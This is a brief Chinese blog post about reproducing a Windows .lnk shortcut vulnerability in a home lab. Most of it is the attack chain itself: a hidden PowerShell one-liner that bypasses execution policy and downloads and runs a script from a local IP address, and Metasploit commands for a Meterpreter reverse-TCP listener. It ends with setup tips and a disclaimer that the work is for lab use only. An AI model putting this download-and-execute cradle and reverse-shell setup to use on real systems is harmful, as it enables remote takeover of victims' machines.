最近Windows出了一个lnk的漏洞,本着不复现不罢休的原则,自己搭建环境复现了一波,虽然没有这么顺利,但最后还是复现成功,哈哈哈哈,大牛就勿喷了,技术能力有限。复现了好久~~~~
1、本机IP
2、利用pentestbox生成一个反弹后门,后门保存地址为C盘根目录
3、开启phpstudy环境,将shell.ps1放置解析根目录下。
4、放入我们的恶意脚本
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.102/111.ps1');xx.ps1"
接着开启我们的神器--msf
metasploit做以下相关配置: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST *.*.*.* //本机IP msf exploit(handler) > set LPORT **** //本机监听端口 msf exploit(handler) > run
小编复现的时候出现了几个问题,试了好久才解决,大牛勿喷
1、首先一定要攻击机器能运行powershell
2、环境变量加上powershell的路径,否则会一直提示找不到powershell
2、本次复现全部在本地实验环境中,文章仅供技术交流,如您使用该文章用户非法攻击其他计算机,造成的损失与本作者一概无关,希望各位老铁们能遵纪守法,做一位合格的好市民。